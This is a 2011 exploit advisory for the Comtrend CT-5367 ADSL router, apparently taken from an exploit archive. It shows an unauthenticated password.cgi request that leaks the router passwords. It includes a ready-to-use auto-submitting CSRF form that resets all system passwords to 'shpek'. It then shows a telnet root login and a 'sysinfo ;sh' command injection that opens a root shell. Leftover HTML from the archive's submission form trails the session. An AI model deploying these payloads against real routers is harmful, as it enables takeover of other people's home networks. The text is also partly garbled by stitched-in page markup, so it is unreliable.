ExploitFixes
Comtrend ADSL Router CT-5367 C01_R12 Remote Root 2011-03-04 16:15:15

/*COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Remote Root
=============================================================================
Board ID : 96338A-122
Software : A111-312BTC-C01_R12
Bootloader : 1.0.37-12.1-1
Wireless Driver : 4.170.16.0.cpe2.1sd
ADSL : A2pB023k.d20k_rc2

=============================================================================
Type : HardWare
Risk of use : High
Type to use : Remote
Discovered by : Todor Donev
Author Email : [email protected]

=============================================================================
Special greetz to my sweetheart friend and my lil' secret Tsvetelina Emirska,
and all my other friends that support me a lot of times for everything !!

*/

[email protected]:~# get.pl http://192.168.1.1/

/*HTTP/1.1 401 Unauthorized
Cache-Control: no-cache
Connection: close
Date: Sat, 01 Jan 2000 00:04:31 GMT
Server: micro_httpd ## Yeah !! Bite me :(
WWW-Authenticate: Basic realm="DSL Router"
Content-Type: text/html

<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>
Authorization required.
<HR>
<ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS>
</BODY></HTML>
*/

[email protected]:~# get.pl http://192.168.1.1/password.cgi ## Information Disclosure

/*HTTP/1.1 200 Ok
Cache-Control: no-cache
Connection: close
Date: Mon, 03 Jan 2000 23:01:25 GMT
Server: micro_httpd
Content-Type: text/html

<html>
<head>
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
<link rel="stylesheet" href='stylemain.css' type='text/css'>
<link rel="stylesheet" href='colors.css' type='text/css'>
<script language="javascript" src="util.js"></script>
<script language="javascript">
<!-- hide\n ## Dammit! =))
pwdAdmin = '<CENSORED>'; ## Censored Password
pwdSupport = '<CENSORED>'; ## Censored Password
pwdUser = '<CENSORED>';\n ## Censored Password
*/



[CUT EXPLOIT HERE] ## CSRF For Change All passwords
<html>
<head></head>
<title>Download</title>
<body onLoad=javascript:document.form.submit()>
<form action="http://192.168.1.1/password.cgi"; method="POST" name="form">
<!-- Change default system Passwords to "shpek" without authentication and verification -->
<input type="hidden" name="sptPassword" value="shpek">
<input type="hidden" name="usrPassword" value="shpek">
<input type="hidden" name="sysPassword" value="shpek">
</form>
</body>
</html>
[CUT EXPLOIT HERE]


[email protected]:~# telnet 192.168.1.1

ADSL Router Model CT-5367 Sw.Ver. C01_R12
Login: root
Password:
## BINGOO !! Godlike =))
> ?

?
help
logout
reboot
adsl
atm
ddns
dumpcfg
ping
siproxd
sntp
sysinfo
tftp
wlan
version
build
ipfilter

> sysinfo
Number of processes: 30
11:46pm up 2 days, 23:46,
load average: 1 min:0.12, 5 min:0.05, 15 min:0.09
total used free shared buffers
Mem: 14012 13028 984 0 588
Swap: 0 0 0
Total: 14012 13028 984

> sysinfo ;sh ## JAILBREAK !! FirmWare sucks :)
Number of processes: 30
11:47pm up 2 days, 23:47,
load average: 1 min:0.07, 5 min:0.05, 15 min:0.08
total used free shared buffers
Mem: 14012 13024 988 0 588
Swap: 0 0 0
Total: 14012 13024 988


BusyBox v1.00 (2009.12.08-09:42+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

# cat /proc/version
Linux version 2.6.8.1 ([email protected]) (gcc version 3.4.2) #1 Tue Dec 8 17:40:39 CST 2009

# ps
PID Uid VmSize Stat Command
1 root 280 S init
2 root SWN [ksoftirqd/0]
3 root SW< [events/0]
4 root SW< [khelper]
5 root SW< [kblockd/0]
15 root SW [pdflush]
16 root SW [pdflush]
17 root SW [kswapd0]
18 root SW< [aio/0]
23 root SW [mtdblockd]
32 root 328 S -sh
65 root 1384 S cfm
72 root SW [bcmsw]
192 root 216 S pvc2684d
275 root 496 S nas -P /var/wl0nas.lan0.pid -H 34954 -l br0 -i wl0 -A
342 root 304 S dhcpd
596 root 1384 S CT_Polling
600 root 432 S pppd -c 0.0.35.1 -i nas_0_0_35 -u <CENSORED> -p
931 root 248 S dhcpc -i nas_0_0_40
993 root 316 S dproxy -D btc-adsl
997 root 352 S upnp -L br0 -W ppp_0_0_35_1 -D
1013 root 512 S siproxd --config /var/siproxd/siproxd.conf
1014 root 512 S siproxd --config /var/siproxd/siproxd.conf
1015 root 512 S siproxd --config /var/siproxd/siproxd.conf
10745 root 292 S syslogd -C -l 7
10747 root 256 S klogd
6616 root 1396 S telnetd
6618 root 1428 S telnetd
6673 root 284 S sh -c sysinfo ;sh
6724 root 284 R ps

# top
Mem: 13164K used, 848K free, 0K shrd, 588K buff, 5920K cached
Load average: 0.00, 0.02, 0.07 (State: S=sleeping R=running, W=waiting)

PID USER STATUS RSS PPID %CPU %MEM COMMAND
6751 root R 288 6675 0.7 2.0 exe
2 root SWN 0 1 0.3 0.0 ksoftirqd/0
6616 root S 1396 65 0.1 9.9 telnetd
931 root S 248 1 0.1 1.7 dhcpc
6618 root S 1428 6616 0.0 10.1 telnetd
65 root S 1384 32 0.0 9.8 cfm
596 root S 1384 65 0.0 9.8 CT_Polling
1013 root S 512 1 0.0 3.6 siproxd
1014 root S 512 1013 0.0 3.6 siproxd
1015 root S 512 1014 0.0 3.6 siproxd
275 root S 496 1 0.0 3.5 nas
600 root S 432 1 0.0 3.0 pppd
997 root S 352 1 0.0 2.5 upnp
32 root S 328 1 0.0 2.3 sh
993 root S 316 1 0.0 2.2 dproxy
6675 root S 316 6673 0.0 2.2 exe
342 root S 304 1 0.0 2.1 dhcpd
10745 root S 292 1 0.0 2.0 exe
6673 root S 284 6618 0.0 2.0 sh
1 root S 280 0 0.0 1.9 init
# echo * ## ls o.O?!?
bin dev etc lib linuxrc mnt proc sbin usr var webs
# </textarea>
</li>
<li id="text-cont_2">
<label for="extension">Text file extension:</label>
<input type="text" name="extension" id="extension" value="txt" class="small" />
</li>
<li id="attch_cont" style="display:none;">
<label for="attached_file">Attached file name:</label>
<input type="text" name="file_path" id="attached_file" value="" class="large" />
</li>
<li>
<label for="application_link">Application link:</label>
<input type="text" name="application_link" id="application_link" value="" class="large" />
</li>
<li>
<label for="application_version">Application version:</label>
<input type="text" name="application_version" id="application_version" value="" class="large" />
</li>
<li>
<label for="application_file_name">Application file name:</label>
<input type="text" name="application_path" id="application_file_name" value="" class="large" />
</li>
<li>
<label for="application_md5">Application file md5:</label>
<input type="text" name="application_md5" id="application_md5" value="" class="large" />
</li>
<li>
<label for="cve">CVE code:</label>
<input type="text" name="cve" id="cve" value="" class="small" />
</li>
<li>
<label for="osvdb">OSVDB code:</label>
<input type="text" name="osvdb" id="osvdb" value="" class="small" />
</li>
<li>
<label for="import_as_gd">Add as google dork:</label>
<input type="checkbox" name="import_as_gd" id="import_as_gd" value="1" onclick="toggleImportGDform();"/>
<ul class="google-dork-import-form" style="display:none;">
<li>
<label for="ghdb_status">Status:</label>
<select name="ghdb_status" id="ghdb_status">
<option value="1" selected="selected">Active</option>
<option value="0">Pending</option>
</select>
</li>
<li>
<label for="ghdb_cat_id">Category:</label>
<select name="ghdb_cat_id" id="ghdb_cat_id">
<option value="0" selected="selected";>Select category</option>
<option value="1">Footholds</option>
<option value="2">Files containing usernames</option>
<option value="3">Sensitive Directories</option>
<option value="4">Web Server Detection</option>
<option value="5">Vulnerable Files</option>
<option value="6">Vulnerable Servers</option>
<option value="7">Error Messages</option>
<option value="8">Files containing juicy info</option>
<option value="9">Files containing passwords</option>
<option value="10">Sensitive Online Shopping Info</option>
<option value="11">Network or vulnerability data</option>
<option value="12">Pages containing login portals</option>
<option value="13">Various Online Devices</option>
<option value="14">Advisories and Vulnerabilities</option>
</select>
</li>

<li>
<label for="ghdb_title">Title:</label>
<input type="text" name="ghdb_title" id="ghdb_title" value="" class="text" />
</li>
<li>
<label for="ghdb_text">Text:</label>
<textarea name="ghdb_text" value="ghdb_text">